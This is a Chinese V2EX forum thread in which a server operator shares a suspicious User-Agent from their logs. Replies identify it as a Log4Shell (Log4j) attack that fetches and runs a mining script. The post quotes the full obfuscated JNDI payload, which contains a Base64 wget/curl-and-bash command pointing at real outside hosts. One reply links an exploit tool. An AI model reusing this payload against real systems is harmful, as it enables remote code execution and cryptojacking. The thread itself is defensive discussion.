User-Agent 注入 - V2EX

Home Sign Up Sign In

• 请不要在回答技术问题时复制粘贴 AI 生成的内容

This topic created in 1583 days ago, the information mentioned may be changed or developed.

年前部署一个接口服务，通过日志，最近发现经常有 User-Agent 异常注入的访问其中一个比较诡异的内容：

t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L2ludGVsLnNoOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvaW50ZWwuc2g7IGJhc2ggaW50ZWwuc2ggNDY4cllRTXhuQ3YzWG9GclhmNWkyUWU5eVpyelZTZGdNV2hqaVAyNjRUQWdKNXc0WGU2UGlKdGFGRjc5amhlNWFIaG1rdVNGOEttc0xkczRyN0hNRHhDelJLbU1UN3o=}')

知道这是干嘛的吗

avatar

11 replies • 2022-02-17 09:33:19 +08:00

1

ThirdFlame

Feb 10, 2022

log4shell

2

silverfox

Feb 10, 2022

https://www.bridewellconsulting.com/log4j-vulnerability-cve-2021-44228

3

zhazi

Feb 10, 2022

https://github.com/Mr-xn/JNDIExploit-1

4

maichaide

Feb 10, 2022

下载脚本开启探矿服务

5

muzuiget

Feb 10, 2022

Log4j 漏洞，就是赌你用 Log4j 把 UserAgent 记录到日志中，实现远程执行代码。

6

yundun2021

Feb 10, 2022

有条件可以上 WAF

7

yu1u

Feb 10, 2022

log4j 漏洞攻击

8

0x73346b757234

Feb 10, 2022

对面想通过 Log4j 漏洞下载 xmrig 挖矿脚本。多谢老哥提供了个样本，测了下自己的规则能覆盖，嘿嘿。

9

kaka6

OP

Feb 10, 2022

@muzuiget 没有用 Log4j 就没事是吧，我是用 python 的 user_agents 记录

10

muzuiget

Feb 10, 2022

@kaka6 没用 Java 肯定没事，对方就是随机扫的。

11

kaka6

OP

Feb 17, 2022

又收到不少的 User-Agent：
Go-http-client/1.1
python-requests/2.20.1
curl/7.75.0

而且还来自世界各地，以前没做这么细的记录，现在全网做记录，发现了不少莫明访客

About · Help · Advertise · Blog · API · FAQ · Solana · 2750 Online Highest 6679 ·

Select Language

创意工作者们的社区

World is powered by solitude

VERSION: 3.9.8.5 · 1704ms · UTC 12:33 · PVG 20:33 · LAX 05:33 · JFK 08:33
♥ Do have faith in what you're doing.